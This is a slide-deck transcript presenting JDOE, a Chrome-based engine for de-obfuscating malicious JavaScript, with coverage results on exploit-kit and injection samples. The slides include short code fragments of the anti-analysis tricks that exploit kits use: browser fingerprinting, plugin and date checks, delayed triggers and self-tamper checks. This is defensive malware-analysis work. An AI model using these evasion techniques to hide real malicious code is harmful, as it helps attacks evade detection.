Java Script DeObfuscation Engine JDOE Nick Guo Ulysses

Java. Script De-Obfuscation Engine -- JDOE Nick Guo, Ulysses Wang

Agenda • • Obfuscation Introduction Anti de-obfuscation Browser Knowledge Current Solution JDOE Demo Challenge & Improvement

Obfuscation Introduction Phase I Review

Obfuscation • Concealing the intent of the code by making the code difficult for human analysis and detection • Copy right protection • Hide Information (E. g. Email address) • Evade detection

Obfuscation Types • Three types of obfuscations • Injection obfuscation • Public Packer Obfuscation • Exploit Kit Obfuscation

Obfuscation Types • “As recorded in 2007, over 80% of detected malicious code was already using obfuscation” • Most obfuscations are simple. • Injection: 83%, exploit kit: <1% • Complex obfuscations occupy a small proportion. • Obfuscation become more complex

Anti de-obfuscation JDOE Prototype

Fragmentation • Splitting important codes into pieces of Javascirpt code, HTML code or external scripts • String concatenate – Var temp=“get”+”Elem”+”ent”+”By. Id” • Tag concatenate – Put content in <div>, <p>, <textarea> – Open. Source Exploit kit

Fragmentation • File concatenate – Put critical function or data in another file – Phoenix Exploit Kit 2. 5 • Traffic concatenate – Save data on server and client need to request

External Access • Fetch external access or perform a connection check • Ajax fetch data • Connection check – Neosploit exploit kit

Condition check • Browser detect uas=navigator. user. Agent; while(uai<uas. length) {xor+=uas. char. Code. At(uai++); } • IE 6 • Firefox

Condition check • Time check • get. UTCFull. Year() • get. UTCMonth() • get. UTCDate() • Plugin check • new Active. XObject('Shockwave. Flash'); (IE) • Check navigator. plugins (not IE)

Trigger Function • Trigger a function after certain seconds • set. Timeout("alert(Hello!')", 3000) • set. Interval("clock()", 1000) • Trigger a function on certain event • <body onload="load()"> • <button id="j_id" onclick="j_function 2(); " • window. attach. Event or add. Event. Listener • Trigger a function on plugin • Call js function from Actionscript

Bypass de-obfuscation tool • Uncommon tag • Save content in CSS • Modification check • var hybxs = arguments. callee; hybxs = hybxs. to. String();

Browser Knowledge JDOE Prototype

Browser Component

Webkit

DOM Tree

Current Solution Phase I Review

Jsunpack • • Light weight Spidermonkey and Python Set hook in js file Environment DOM Enumeration Detection module(Yara) PDF and SWF parser Intrusion Detection(libnids) http: //jsunpack. jeek. org/

Fireshark • • Firefox Plugin Mainwindow and child Frame Source Code Mainwindow and child Frame DOM Tree Http Request and Response Logged Malicious URL check URL redirection graph http: //fireshark. org/

Malzilla • • • Research tool Spidermonkey Shellcode analysis Limited DOM support http: //malzilla. sourceforge. net/

Limitations • • Firefox based Limited on DOM support Limited on De-obfuscation Performance

JDOE Phase I Review

JDOE • What engine we want ? • • High performance Good coverage Good output and log formats Analytics platform

JDOE • JDOE is based on Google Chrome • Render Engine : Webkit • 85% smart phone browser market • 21% desktop browser market • Include DOM tree and parser • Java. Script Engine : V 8

Prototyping • JDOE based on a test project for Chrome • Command line tool, feasible to be ported as serverside application • Be able to simulate basic functions of browser • Full DOM Support • Good fault tolerance about html format • HTML format output

JDOE Architecture

JDOE advantage • • • Base on Chrome and Webkit Strong Parser Full DOM Support Fast js execution speed High coverage Good expansibility

De-obfuscation Method • JDOE De-obfuscation Method • Hook eval() – Get some inner status of Java. Script • Print the final DOM tree – Get the final status – Document. write should add some nodes in DOM tree

Exploit kit Coverage • Exploit kits Samples JDOE Failed – Samples from Top 10 exploit kits project – Total Samples : 22 JDOE success : 20 JDOE Success 9% – Coverage : 90. 9% 91%

Injection Coverage • Injection Samples JDOE Failed – Samples from obfuscation Threat. ID matches – Total Samples : 9, 544 JDOE Success : 8, 450 JDOE Success 11% – Coverage : 88. 5% 89%

Demo time Demo

Challenge & Improvement Status and Next Step

Challenge • Security • How to keep JDOE server secure? – Upgrade plan – Sandbox – Javascript Audit • Performance • Disable external access • Coverage • Not support on special samples • Output format defected on special samples

improvement • • • More trigger function handler PDF and SWF Parser Shellcode detection Javascript Audit Cloud base integration • http: //aceinsight. websense. com/ • Auto analysis platform

JDOE Questions? 37